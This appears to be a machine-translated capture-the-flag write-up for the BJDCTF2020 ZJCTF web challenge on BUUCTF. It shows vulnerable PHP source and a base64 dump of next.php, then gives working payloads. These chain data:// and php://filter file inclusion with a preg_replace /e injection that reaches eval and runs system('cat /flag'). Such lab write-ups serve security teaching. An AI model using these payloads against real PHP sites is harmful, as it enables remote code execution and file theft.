BUUCTF WEB [BJDCTF2020]ZJCTF, nothing more than this

• Get the source code after entering the environment

  <?php
  
  error_reporting(0);
  $text = $_GET["text"];
  $file = $_GET["file"];
  if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
        
      echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
      if(preg_match("/flag/",$file)){
        
          die("Not now!");
      }
  
      include($file);  //next.php
      
  }
  else{
        
      highlight_file(__FILE__);
  }
  ?>
  

• Use PHP Pseudo protocol construction payload

  ?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
  

  The echo

  PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0K
  

  base64 Decrypt

  <?php
  $id = $_GET['id'];
  $_SESSION['id'] = $id;
  
  function complex($re, $str) {
        
      return preg_replace(
          '/(' . $re . ')/ei',
          'strtolower("\\1")',
          $str
      );
  }
  
  
  foreach($_GET as $re => $str) {
        
      echo complex($re, $str). "\n";
  }
  
  function getFlag(){
        
  	@eval($_GET['cmd']);
  }
  
  

• You can see here cmd There is a command execution vulnerability in parameter , But the question is how to call getFlag() function . This involves preg_replace /e Pattern code execution vulnerability

  function complex($re, $str) {
        
      return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
  }
  
  foreach($_GET as $re => $str) {
        
      echo complex($re, $str). "\n";
  }
  

  if payload by

  /?.*={${phpinfo()}}
  

  be

   Original statement ： preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value);
   It becomes a statement ： preg_replace('/(.*)/ei', 'strtolower("\\1")', {
        ${
        phpinfo()}});
  

  Be careful ： Add... To both sides of regular expression pattern or partial pattern () Store the string that causes the match in the temporary buffer , Buffer number from 1 Start , Maximum storage 99 Sub expression . Each buffer can be used \n visit , among n Number the buffer .

  preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}}); It will put {${phpinfo()}} Store to buffer 1, At this time, the matched string is /(\\1)/ei,\\1 namely \1, This will cause the contents of the backreference buffer , Change it to /{${phpinfo()}}/ei, This causes the command to execute .

• In the subject ,PHP Will send the incoming illegal $_GET Array parameter names are converted to underscores , the .* Turn into _. You can modify payload by

  ?\S*=${getFlag()}&cmd=...
  

  among \S Means to match any non whitespace character , So that we can call getFlag The purpose of the function

• structure payload

  ?\S*=${getFlag()}&cmd=system('cat /flag'); 
  

  The echo

  flag{6b53cc7c-e9e8-47a1-80ed-10ca16c81ae5} system('cat /flag');